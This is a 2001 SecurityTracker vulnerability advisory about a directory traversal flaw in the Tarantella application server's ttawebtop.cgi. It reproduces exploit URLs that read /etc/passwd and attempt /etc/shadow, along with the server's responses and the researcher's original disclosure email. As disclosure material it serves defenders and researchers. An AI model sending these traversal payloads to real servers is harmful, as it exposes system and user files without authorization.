SecurityTracker: Tarantella Application Web Server Discloses Files on the Server to Remote Users

	Keep Track of the Latest Vulnerabilities with SecurityTracker!

Home | View Topics | Search | Contact Us |

SecurityTracker
Archives

Sign Up for Your FREE Weekly SecurityTracker E-mail Alert Summary

Instant Alerts

Buy our Premium Vulnerability Notification Service to receive customized, instant alerts

Put SecurityTracker Vulnerability Alerts on Your Web Site -- It's Free!

Become a Partner and License Our Database or Notification Service

Report a Bug

Report a vulnerability that you have found to SecurityTracker
bugs
@
securitytracker.com

Category: Application (Web Server/CGI) > Tarantella

Vendors: Tarantella, Inc.

Tarantella Application Web Server Discloses Files on the Server to Remote Users

SecurityTracker Alert ID: 1001779

SecurityTracker URL: http://securitytracker.com/id/1001779

CVE Reference: GENERIC-MAP-NOMATCH (Links to External Site)

Date: Jun 19 2001

Impact: Disclosure of system information, Disclosure of user information

Exploit Included: Yes

Description: A vulnerability has been reported in the Tarantella application server that lets remote users obtain files located anywhere on the server.

The vunerability reportedly resides in the ttawebtop.cgi module.

If a remote user issues the following type of example URL, the server will return the world-readable password file:

http://[targethost]/tarantella/cgi-bin/ttawebtop.cgi/?action=start&pg=../../../../../../../../../../../../../../../etc/passwd

If a remote user attempts to retrieve a file that is not readable by the web server, it will return a 'file missing' error message, as shown below:

http://[targethost]/tarantella/cgi-bin/ttawebtop.cgi/?action=start&pg=../../../../../../../../../../../../../../../etc/shadow

File missing

The following file could not be found:

/tarantella/../../../../../../../../../../../../../../../etc/shadow

The vendor has reportedly been notified.

Impact: A remote user can obtain world-readable files located anywhere from the server.

Solution: No solution was available at the time of this entry.

Vendor URL: www.tarantella.com/ (Links to External Site)

Cause: Access control error, Input validation error

Underlying OS: Linux (Caldera/SCO), Linux (Red Hat Linux), Linux (SuSE), Linux (Turbo Linux), UNIX (AIX), UNIX (HP/UX), UNIX (Open UNIX-SCO), UNIX (Solaris - SunOS), UNIX (Tru64)

Message History: This archive entry has one or more follow-up message(s) listed below.

(Vendor Has Fixed This Issue) Re: Tarantella Application Web Server Discloses Files on the Server to Remote Users (Mike McEwen <mikemc@tarantella.com>)
The vendor announces that they have fixed the problem. The vendor reports on which versions were vulnerable.

Source Message Contents

Date: Mon, 18 Jun 2001 13:18:08 -0400
Subject: SCO Tarantella Remote file read via ttawebtop.cgi

SCO has been notified of this issue. 

-------- Original Message --------
Subject: SCO Tarantella Remote file read via ttawebtop.cgi
Date: Mon, 18 Jun 2001 13:06:41 -0400
From: KF <dotslash@snosoft.com>
To: recon@snosoft.com

http://xxx/tarantella/cgi-bin/ttawebtop.cgi/?action=start&pg=../../../../../../../../../../../../../../../etc/passwd

root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:
daemon:x:2:2:daemon:/sbin: adm:x:3:4:adm:/var/adm:
lp:x:4:7:lp:/var/spool/lpd: sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/
...

No perms to shadow... 

http://xxx/tarantella/cgi-bin/ttawebtop.cgi/?action=start&pg=../../../../../../../../../../../../../../../etc/shadow

File missing

The following file could not be found:

/tarantella/../../../../../../../../../../../../../../../etc/shadow

 Please give this information to a Tarantella Administrator.

-KF

Go to the Top of This SecurityTracker Archive Page

Home | View Topics | Search | Contact Us
Copyright 2012, SecurityGlobal.net LLC